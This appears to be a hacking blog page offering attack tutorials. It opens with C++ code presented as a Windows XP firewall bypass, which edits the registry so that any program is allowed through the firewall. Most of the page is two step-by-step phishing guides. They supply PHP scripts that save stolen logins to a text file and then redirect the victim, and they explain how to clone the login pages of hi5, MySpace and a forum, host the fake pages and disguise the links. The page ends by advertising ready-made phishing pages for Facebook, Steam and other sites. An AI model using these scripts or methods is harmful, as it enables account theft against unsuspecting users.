http://besthackingforums.blogspot.com/ Hacking It: Phishing tutourial`s http://besthackingforums.blogspot.com/
 
500 hacking tuts of 2009
***************************************
[c++] Windows Xp Firewall Bypass

include
#include

int AddToWindowsFirewall(char *displayname,char * exepath);

int main()
{
char dspname[MAX_PATH] = "";
char exepath[MAX_PATH] = "";

printf("Add To WinXP SP2 Firewall Exeception List\nBy Smith\n\n");

printf("Enter display name: ");
gets(dspname);

printf("Enter exe path: ");
gets(exepath);

if(AddToWindowsFirewall(dspname,exepath))
{
printf("Success!\n");
}else{
printf("Failure!\n");
}
return 0;
}

int AddToWindowsFirewall(char *displayname,char * exepath)
{
HKEY hKey;

char filedata[MAX_PATH] = "";

wsprintf(filedata,"%s:*:Enabled:%s",exepath,displayname);

if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"System\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",0,KEY_ALL_ACCESS,&hKey)) return 0;
if(RegSetValueEx(hKey,exepath,0,REG_SZ,(unsigned char*)filedata,sizeof(filedata))) return 0;

RegCloseKey(hKey);

return 1;//Success

****************************************************************************
Pre phished pages to download are @ the
bottom of the page

*****************************************************************
Phishing Tutourial`s


First we create a PHP script that will save the passwords in a text file.

1.) Open notepad and put this code:

CODE
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

2.)Now save this as phish.php

Note:
CODE
header ('Location: http://www.hi5.com/friend/login.do ');

This URL is where the victim is redirected after logging in to you fake page.
The best way to do this is to go to the original site(in this case hi5) and try to login without username and password.Of course then the site will tell you that the username/password incorrect.Now copy that url and paste in that part of the phish.php script.As you can see the hi5 has got "http://www.hi5.com/friend/login.do"

Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password's.

Part 2:

Now we go to http://www.hi5.com and right click / View Source.
Now we need to find the place where LOGIN button in Hi5 page send the user after clicking on it.
To do that we search for something like:
CODE
action=anything.

In this case we have:
CODE
action="/friend/login.do"

We replace that part with:
CODE
action="phish.php"

Then we copy the whole source and save this file as login.php.

Now upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go.Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.
The phishing link should be something like this:


http://something.awardspace.com/login.php ---> Send this to your victim

And the txt file with the passwords like this:

http://something.awardspace.com/passwords.txt ---> View the passwords with this one.

********************************************************
& here`s another phish tut from Dark world if this
makes it any clearer


Phishing Tutorial (Very clear and good for newbs)
This will be a basic tut on how to make a phisher! I will be using a variety of websites. Crow used myspace, but I will teach you how to make it with any!

Index:
What is a phisher? - 101
Making a T35 Account - 102
Getting Web pages Source Code - 103
Creating Phish File - 104
How to fool people - 105
------------------------
What is a phisher? 101
------------------------

A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.

--------------------------
Making a T35 Account 102
--------------------------

In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).spam.com For example: myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07.

--------------------------------------
Getting Web Pages Source Code 103
--------------------------------------

After you create that page, go to the website you will make a phisher for, I will use KHI ( http://www.forums.khinsider.com ) Make sure you are logged out and and attempt to post a message. You will get an error saying you must log-in. From tehre right-click the page, and click View Source. Copy and paste what has popped-up.

------------------------
Creating Phish File 104
------------------------

Once you have that copied, go to your T35 account. Click on "New File" Title it login.htm Then paste your Source Code you copied from 104. Save it.

Now create another file, title it fhish.php And inside, paste this code:

Code:

header("Location: http://www.myspace.com");
$handle = fopen("thepasses.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The http://www.myspace.com is what the page goes to after the victim logs in, change that to what desired

Save the file.


Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!

-------------------------
How to fool people - 105
-------------------------
What you do now is disguise your link. Use this code:

Code:
T35acount.spam.com/login.htm

That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.
Code:
*real website name*.com/login.php

You do the same for any forum!


Thank you for reading! Hope it helps! If i was missing something, or you have any questions, PM me!

ALTERNATIVES:

Also, if you don't want to use spam.com, use ripway.com after you`ve uploaded everything, go to http://www.dot.tk - choose a free .tk domain name.
http://www.citizengold.com/storedfiles/T...sshole.MP3
http://thekickback.com/rickroll/rickroll.php

*****************************************************************

OVER 30 PRE PHISHED PAGES

ready to go
A large collection of pre phished pages

aol
facebook
mega upload
itunes
my space
photo bucket
& steam to name a few


0 comments:

Visit the Site